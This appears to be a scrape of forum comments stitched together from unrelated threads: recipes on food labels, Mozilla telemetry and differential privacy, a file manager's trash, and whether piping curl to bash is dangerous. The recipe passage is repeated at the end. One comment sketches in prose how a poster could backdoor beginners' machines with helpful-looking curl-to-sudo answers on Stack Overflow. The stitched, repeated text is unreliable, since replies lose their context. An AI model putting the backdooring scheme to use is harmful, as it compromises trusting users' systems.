Alternative hypothesis: most 'secret family recipes' are in fact original. However, the average SFR never get passed around, because it produces average-tasting stuff.
The recipe on food labels come from companies that know the product inside-out, have incentive to help you optimize the taste/effort tradeoff, and maybe have spent time and money on research. They tastes better, so they're the ones people remember.
tl;dr: people remember a disproportionately high number of plagiarized recipes because those are the good ones.
Are we going to get a browser that caters to our own needs? No, evidently power users are no longer the target demographic.
Are we going to make a browser that we can recommend to our nontechie friends? No, I don't trust them to navigate all the opt-outs and dark patterns around your telemetry. I don't even trust myself to never misclick.
Is contributing going to win us goodwill from our collegues? No, you've alienated them too.
Is this about ideology, then? Are we building a browser for a better world? ..it would be much more convincing if you guys didn't fire your CEO over political speech.
And that's where we're at right now. Maybe the 97% or whatever non-addon-using demographic in your telemetry data will make up the shortfall in contributions.
It's the other way around I think, telemetry isn't (wasn't?) on by default and I enabled it on purpose. And I'm a power user, that's why I don't use chrome (1k tabs here).
I think that's what the demo showed, a deleted file is put into roamer's trash directory. So when a file is deleted (or moved), the hash points to the new location, the trash in this case.
1. Any data collection at all deanonymizes the user, cf panopticlick.
2. Frankly even opt-out is not acceptable. I can't recommend any software that peridically asks users for data access, since there exist non-technical users who have a nonzero chance of clicking yes to everything. If they are related to me in some way this compromises my privacy also.
1. Any data collection at all deanonymizes the user, cf panopticlick.
This isn't true. Panopticlick collects a ton of data about your browser that this proposal will not. There has been a lot of research done in this area and we know how to collect anonymous datasets. https://arxiv.org/abs/1407.6981
Look at it from a security-conscious user's perspective: I would have to verify that:
1. The concept is sound.
2. It is implemented as described.
3. It is implemented with no bugs.
4. Mozilla is trustworthy
5. Any third-parties Mozilla involves in this process are also trustworthy.
6. All of the above will remain true.
Doing this would take a tremendous amount of both time and expertise, if even possible. If every piece of software I use makes me do this every year or so, I would get nothing else done.
In practical terms, your argument is no better than just saying, 'trust us, we're good for it', regardless of the merits of your tech. And we know Mozilla baked Google Analytics into FF's addon page, so trust is in short supply.
Except if you actually read and understood the link, points #1, 4, 5 aren't a concern. Moreover, points #2, 3, and 6 apply to just about every piece of software used.
what percentage of FF users on the planet do you expect could read a paper on differential privacy and actually verify those points, while understanding all the ifs and gotchas, and be able to tell if any of the arguments are wrong? What percentage of that elite group would actually be willing to devote the time and energy, for free, for every one of the thousands of softwares they use?
Not many, certainly. Which is perhaps why it's better for this to be implemented (since differential privacy is a known, rigorous definition for privacy), rather than to leave it up to the larger majority of users who (by your implication) don't understand it and won't be bothered to understand it.
...or you could just scrap the whole idea and not bother with it.
This is true for the user, too. If the only viable choices are 'verify claims at great cost and no gain every few months', or 'use some other privacy-respecting browser', I am going to recommend the second.
Look at it this way: whenever you are running a program you didn't write yourself, you're running a bunch of commands you never checked. This is no different to, say, downloading a precompiled executable and running it, with all the same problems and tradeoffs.
It is different. While it is obviously true that I haven't checked all of the binaries I'm running, I at least can, through the various signatures involved, rely on the fact that it was created by a particular individual or group, whom I may trust.
Would you really assign the same level of trust to, eg, a sudo(8) binary downloaded somewhere of the internet as you would to the one provided by your distribution?
That's not the comparison being made. It's between piping curl to bash, or just downloading a script and running it with sudo, without inspecting.
Yes, you "could inspect". But this is about the instructions. And instructions to pipe curl to bash are no more or less harmful than instructions to download a binary from a "random" server and run it verbatim.
"Piping curl to bash" is a red herring. It's "running unverified code" that's the problem. Piping curl to bash just makes it viscerally obvious how dangerous that is.
There are various levels of trust, of course. The packages in Debian or RedHat are more trustworthy (there is a process) than those in NPM or Maven (free-for-all, even if you have some assurance that the package you're downloading is the very same the developer uploaded).
But installing a random NPM package is no more dangerous than curl-piping a script from Github to bash over HTTPS (without -k). You're still sure that what you're downloading and running is what whoever is in control of that repo intended.
What IS more dangerous is training a generation of developers to solve problems by quickly copy-pasting random strangers' magic incantations from random blogs or Stackoverflow into their terminals. You could probably infect a large number of machines very quickly by stalking certain categories on Stackoverflow for "noob" questions and giving a good answer in the form of a GitHub gist curl-pipe to sudo that fixes the problem, but that also discreetly backdoors the target.
The recipe on food labels come from companies that know the product inside-out, have incentive to help you optimize the taste/effort tradeoff, and maybe have spent time and money on research. They tastes better, so they're the ones people remember.
tl;dr: people remember a disproportionately high number of plagiarized recipes because those are the good ones.